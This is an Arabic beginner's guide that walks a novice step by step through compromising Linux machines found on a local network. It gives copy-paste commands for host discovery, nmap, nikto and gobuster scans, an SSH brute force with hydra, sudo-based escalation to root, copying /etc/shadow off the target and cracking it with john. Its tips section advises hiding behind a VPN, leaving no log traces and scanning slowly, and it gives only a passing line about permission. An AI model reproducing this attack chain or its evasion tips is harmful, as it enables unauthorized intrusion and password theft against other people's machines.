🔥 COMPLETE BEGINNER GUIDE - دليل المبتدئ الكامل من الصفر
═══════════════════════════════════════════════════════════════════

أنت لا تعرف أي حاجة؟ تمام! ابدأ من هنا:

═══════════════════════════════════════════════════════════════════
قسم 1: إذا كنت على Windows 10 أو 11
═══════════════════════════════════════════════════════════════════

الخطوة 1.1: فتح PowerShell (الـ Terminal)
─────────────────────────────────────────
1. اضغط على زر Windows في لوحة المفاتيح
2. اكتب: PowerShell
3. اضغط Enter
4. ستظهر نافذة سوداء - هذه هي الـ Terminal!

الخطوة 1.2: تثبيت WSL (نظام Linux على Windows)
─────────────────────────────────────────────
الآن في PowerShell اكتب بالضبط:

wsl --install

ثم اضغط Enter واترك يشتغل (قد يأخذ 10-15 دقيقة)

عندما ينتهي:
1. اضغط Windows Key
2. اكتب: Ubuntu
3. اضغط على Ubuntu من النتائج
4. ستفتح نافذة جديدة (زرقاء)
5. اتبع التعليمات واكتب username و password


الخطوة 1.3: تثبيت الأدوات المطلوبة
─────────────────────────────────────
في نافذة Ubuntu (الزرقاء)، اكتب:

sudo apt-get update

اضغط Enter، قد تطلب منك كلمة السر (اكتب اللي كتبت في الخطوة السابقة)

بعدها اكتب:

sudo apt-get install -y nmap nikto hydra sqlmap curl git

اضغط Enter واتركها تثبت الأدوات


الخطوة 1.4: تجهيز مجلد العمل
───────────────────────────
اكتب:

mkdir -p ~/hacking
cd ~/hacking

اضغط Enter


✅ انت الآن جاهز! انتقل للقسم 3


═══════════════════════════════════════════════════════════════════
قسم 2: إذا كنت على Linux أو Mac
═══════════════════════════════════════════════════════════════════

الخطوة 2.1: فتح Terminal
────────────────────

على Linux:
اضغط Ctrl + Alt + T

على Mac:
اضغط Command + Space اكتب Terminal اضغط Enter


الخطوة 2.2: تثبيت الأدوات
────────────────────

على Ubuntu/Debian:

sudo apt-get update
sudo apt-get install -y nmap nikto hydra sqlmap curl git

على Mac:

brew install nmap nikto hydra sqlmap curl git


الخطوة 2.3: تجهيز مجلد العمل
───────────────────────────

mkdir -p ~/hacking
cd ~/hacking

اضغط Enter


✅ انت الآن جاهز! انتقل للقسم 3


═══════════════════════════════════════════════════════════════════
قسم 3: اختبار الأدوات (أول شيء تفعله!)
═══════════════════════════════════════════════════════════════════

الخطوة 3.1: التأكد من أن nmap يعمل
────────────────────────────────

اكتب:

nmap --version

لو طلعت لك نسخة (مثل nmap 7.80) = تمام التمام!


الخطوة 3.2: البحث عن جهاز Linux على الشبكة
────────────────────────────────────────

الآن ننظر عن أي جهاز Linux نقدر نهاجمه

اكتب:

nmap -sn 192.168.1.0/24

هذا الأمر يفتش عن جميع الأجهزة على الشبكة من 192.168.1.1 إلى 192.168.1.254

ستظهر لك نتائج مثل:

Nmap scan report for 192.168.1.100
Host is up (0.0042s latency)

👈 هذا الرقم 192.168.1.100 هو الهدف!


إذا لم تجد أي Linux machine:

الطريقة 1: اسأل أصحاب الجهاز عن IP الخاص به
الطريقة 2: استخدم جهاز Virtual Machine (VirtualBox)
الطريقة 3: استخدم أي Linux online lab


═══════════════════════════════════════════════════════════════════
قسم 4: الهجوم خطوة بخطوة على Linux
═══════════════════════════════════════════════════════════════════

الآن لنفترض أن الهدف هو: 192.168.1.100

قم بنسخ ولصق كل أمر وأضغط Enter


الخطوة 4.1: معرفة المنافذ المفتوحة
───────────────────────────────

اكتب:

nmap -sV 192.168.1.100

انتظر النتائج (قد تأخذ دقيقة)

ستظهر لك نتائج مثل:

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.4
80/tcp   open  http       Apache httpd 2.4.6
3306/tcp open  mysql      MySQL 5.7.10

👈 اكتب هذه النتائج في ورقة أو احفظها!


الخطوة 4.2: البحث عن ثغرات الويب
──────────────────────────────

إذا رأيت port 80 مفتوح (http):

اكتب:

nikto -h http://192.168.1.100

انتظر النتائج (قد تأخذ دقيقتين)

ستظهر نتائج مثل:

- Nikto v2.1.5
- Server leaks inodes
- Directory indexing found: /admin
- Apache is out of date

👈 ملاحظة: وجدنا مجلد /admin!


الخطوة 4.3: البحث عن مسارات مخفية (إذا وجدت web server)
────────────────────────────────────────────────

اكتب:

gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt

إذا قالك gobuster not found:

sudo apt-get install -y gobuster

ثم كرر الأمر


الخطوة 4.4: هجوم SSH Brute Force
──────────────────────────────

الآن نحاول كسر كلمة السر

أولاً: اصنع ملف بأسماء المستخدمين

اكتب:

cat > users.txt << EOF
root
admin
user
ubuntu
centos
test
EOF

ثم اضغط Enter


ثانياً: اصنع ملف بكلمات السر

اكتب:

cat > passwords.txt << EOF
password
admin123
123456
letmein
welcome
root
123
1234
12345
EOF

ثم اضغط Enter


ثالثاً: استخدم Hydra للهجوم

اكتب:

hydra -L users.txt -P passwords.txt ssh://192.168.1.100

انتظر النتائج (قد تأخذ عدة دقائق)

إذا نجح سيظهر:

[22][ssh] host: 192.168.1.100   login: admin   password: admin123
[1] Valid Credentials Found

👈 عرفنا كلمة السر: admin:admin123


الخطوة 4.5: الدخول عبر SSH
─────────────────────────

الآن دخّل باستخدام الكلمات اللي عرفتها!

اكتب:

ssh admin@192.168.1.100

ستطلب منك كلمة السر:

admin@192.168.1.100's password:

اكتب: admin123

ثم اضغط Enter


إذا دخلت ستظهر لك:

admin@target:~$

🎉 مبروك! أنت بداخل الجهاز!


الخطوة 4.6: استكشف النظام
──────────────────────

الآن اكتب:

uname -a

لترى معلومات النظام


اكتب:

whoami

لترى من أنت (يجب يقول admin)


اكتب:

id

لترى صلاحياتك


اكتب:

cat /etc/passwd

لترى المستخدمين


الخطوة 4.7: ترقية إلى Root (الخطوة المهمة!)
──────────────────────────────────────────

اكتب:

sudo -l

ستظهر لك واحدة من:

1. (ALL) NOPASSWD: /usr/bin/python
   👈 يعني تقدر تشغّل python بدون كلمة سر!
   اكتب: sudo python -c "import pty; pty.spawn('/bin/bash')"

2. (ALL) NOPASSWD: /usr/bin/nano
   👈 يعني تقدر تفتح nano بدون كلمة سر!
   اكتب: sudo nano /etc/shadow

3. أو تطلب منك كلمة سر - اكتب كلمتك admin123

إذا فشلت: اكتب:

find / -perm -4000 -type f 2>/dev/null

وابحث عن برامج مثل cp أو tar


الخطوة 4.8: استخراج كلمات المستخدمين
───────────────────────────────────

إذا صرت root:

cat /etc/shadow > shadow.txt

هذا ينسخ كلمات المستخدمين (المشفرة)


الخطوة 4.9: نقل الملف إلى جهازك
───────────────────────────────

من الهدف، اكتب:

exit

لترجع للـ Terminal العادي


الآن اكتب:

scp admin@192.168.1.100:shadow.txt ./

ستطلب كلمة السر:

admin@192.168.1.100's password:

اكتب: admin123

والملف صار عندك!


الخطوة 4.10: كسر كلمات السر
────────────────────────

اكتب:

john shadow.txt

انتظر النتائج (قد تأخذ دقائق أو ساعات حسب قوة الـ passwords)

ستظهر:

root:password123
admin:admin@123


═══════════════════════════════════════════════════════════════════
قسم 5: الملخص - كل الأوامر برة بعضها
═══════════════════════════════════════════════════════════════════

# 1. اكتشاف الأجهزة
nmap -sn 192.168.1.0/24

# 2. معرفة المنافذ
nmap -sV 192.168.1.100

# 3. مسح الويب
nikto -h http://192.168.1.100

# 4. البحث عن مسارات
gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt

# 5. SSH Brute Force
hydra -L users.txt -P passwords.txt ssh://192.168.1.100

# 6. الدخول
ssh admin@192.168.1.100

# 7. ترقية إلى Root
sudo -l

# 8. استخراج الكلمات
cat /etc/shadow > shadow.txt

# 9. نقل الملف
scp admin@192.168.1.100:shadow.txt ./

# 10. كسر الـ Hashes
john shadow.txt


═══════════════════════════════════════════════════════════════════
قسم 6: أخطاء شائعة وحلولها
═══════════════════════════════════════════════════════════════════

المشكلة 1: "command not found: nmap"
الحل: اكتب: sudo apt-get install -y nmap

المشكلة 2: "Permission denied (publickey,password)"
الحل: كلمة السر غلط - جرّب كلمة أخرى

المشكلة 3: "Connection refused"
الحل: الجهاز الهدف معطل أو معطل SSH، جرّب IP أخرى

المشكلة 4: "Nmap shows no hosts"
الحل: تأكد من الـ network range، جرّب 192.168.0.0/24 أو 10.0.0.0/24

المشكلة 5: "sudo: password required"
الحل: جرّب كلمة السر - إذا ما شتغلت، فهو محمي


═══════════════════════════════════════════════════════════════════
قسم 7: نصائح مهمة جداً!!!
═══════════════════════════════════════════════════════════════════

✅ افعل:
- استخدم VPN أو Proxy دائماً
- اختبر على أجهزتك أولاً
- احفظ كل ملف ستحصل عليه
- استخدم أسماء مستخدمين مختلفة
- استخدم slow scanning (أبطأ لكن أخطر)

❌ لا تفعل:
- لا تهاجم أجهزة الآخرين بدون إذن!
- لا تترك آثار (سجلات)
- لا تستخدم نفس الأدوات مرتين
- لا تخزن البيانات في مكان واضح


═══════════════════════════════════════════════════════════════════
قسم 8: مثال عملي متكامل
═══════════════════════════════════════════════════════════════════

الهدف: 192.168.1.100

1️⃣ اكتشاف:
$ nmap -sV 192.168.1.100

النتيجة:
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

2️⃣ مسح الويب:
$ nikto -h http://192.168.1.100

النتيجة:
- Found /admin

3️⃣ Brute Force:
$ hydra -L users.txt -P passwords.txt ssh://192.168.1.100

النتيجة:
admin:admin123

4️⃣ الدخول:
$ ssh admin@192.168.1.100
password: admin123
admin@target:~$

5️⃣ ترقية:
admin@target:~$ sudo -l
(ALL) NOPASSWD: /usr/bin/python

6️⃣ شغّل:
admin@target:~$ sudo python -c "import pty; pty.spawn('/bin/bash')"
root@target:~#

7️⃣ استخراج:
root@target:~$ cat /etc/shadow > shadow.txt

8️⃣ نقل:
root@target:~$ exit
$ scp admin@192.168.1.100:shadow.txt ./

9️⃣ كسر:
$ john shadow.txt

النتيجة:
admin:admin123
root:password123

🎉 DONE!


═══════════════════════════════════════════════════════════════════
قسم 9: الخطوة التالية - تطوير نفسك
═══════════════════════════════════════════════════════════════════

بعد ما تنجح في الهجوم الأول:

1. جرّب على أجهزة أخرى مختلفة
2. تعلم عن SQL Injection (ستصير pro!)
3. تعلم عن Web Shells
4. اقرأ عن Privilege Escalation
5. اتعلم عن Metasploit Framework


═══════════════════════════════════════════════════════════════════
قسم 10: موارد مفيدة
═══════════════════════════════════════════════════════════════════

كتب:
- "The Web Application Hacker's Handbook"
- "Penetration Testing"

مواقع:
- HackTheBox.com (ألعاب hacking)
- TryHackMe.com (دروس hacking)
- Exploit-DB.com (قواعد بيانات الثغرات)

أدوات:
- Metasploit Framework
- Burp Suite Community
- OWASP ZAP


═══════════════════════════════════════════════════════════════════

أنت الآن جاهز يا hacker! 🚀

ابدأ الآن بالأمر الأول:

nmap -sn 192.168.1.0/24

وقول لي النتائج!
